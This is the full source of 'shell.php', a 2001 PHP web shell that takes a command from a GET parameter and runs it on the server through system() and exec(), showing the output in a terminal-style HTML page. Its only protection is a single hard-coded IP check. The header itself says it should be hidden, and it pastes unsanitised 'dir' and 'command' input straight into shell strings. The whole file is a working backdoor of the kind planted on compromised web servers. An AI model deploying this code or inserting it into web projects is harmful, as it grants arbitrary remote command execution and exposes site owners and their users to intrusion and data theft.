shell.php


<?php
/****************************************************************************\
|*                                                                          *|
|*                        shell.php - simple php shell                      *|
|*                                                                          *|
|****************************************************************************|
|*                                                                          *|
|*    This is the script issues raw commands on the php enabled server,     *|
|*    it is very dangerous and should be hidden and password protected.     *|
|*    NOTE: This script is self contained and hates safe mode in php.       *|
|*                                                                          *|
|*   Author: Fanis Dokianakis <madf#hellug.gr>, Last Modified: 11/11/01     *|
|*                                                                          *|
|*   Copyright (C) 2001 by Fanis Dokianakis                                 *|
|*                                                                          *|
\****************************************************************************/


$DEBUG=0;
$init_dir="/var/www";
$allow_from="192.168.0.1";

if ( $REMOTE_ADDR !== $allow_from ) die ("Nope you can't connect");

if ($DEBUG) echo $command,$dir;

if ( !isset($command) ) $command="";

if ( isset($dir) or !($dir == "") ) {
$work_dir=trim(exec("cd $dir ; pwd"));
} else {
$work_dir=trim(exec("cd $init_dir ; pwd"));
}

if ( ereg("^cd", $command) ){
$change_dir=ereg_replace(";.$","",ereg_replace("^cd ","",$command));
$work_dir = trim(exec("cd $dir ; cd $change_dir ; pwd"));
}

if ( ereg("^cd", $command) ) $command=ereg_replace("^.;","",$command);
if ($command == "") $command = "wait";

?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
  <title>shell in php</title>
</head>

<body bgcolor="#3F4682" text="white">
<center>
<table bgcolor="#2F8894" width="98%" cellspacing=2 cellpadding=1>
<tr><td>
<table width="100%" border=0 cellspacing=0 cellpadding=0>
<tr>
<td bgcolor="black">
<form name="myform" action="<?php echo $PHP_SELF ?>" method="GET">
<textarea color="black" readonly cols="65" rows="24"
style="font-weight: bold; color: white; background-color: black; 
font-size: medium; border: 0 solid rgb(0,0,0); vertical-alignment: sub;">
<?php system("cd $work_dir;$command");?>
</textarea>
<table border=0 cellspacing=0 cellpadding=0>
<tr>
<td><b><font color="lightgreen"><?php echo $HTTP_HOST;?></font>:<font 
color="red">[</font><font color="blue">php</font><font color="red">]</font> <font color="#90468C"><?php echo trim($work_dir) ?> </font><font color="yellow">$ </font></b></td>
<td>
<input type="text" name="command" value="" size="40" maxlength="255"
style="background-color: #000000; color: #FFFFFF ; border: 0 solid rgb(0,0,0);
font-weight: bold; font-size: medium;;">
</td></tr>
</table>
<input type="hidden" name="dir" value="<?php echo $work_dir ?>">
</form>
</td></tr>
</table>
</td></tr>
</table>
</center>
<?php if ($DEBUG) echo $command,"\n",$work_dir ?>
</body>
</html>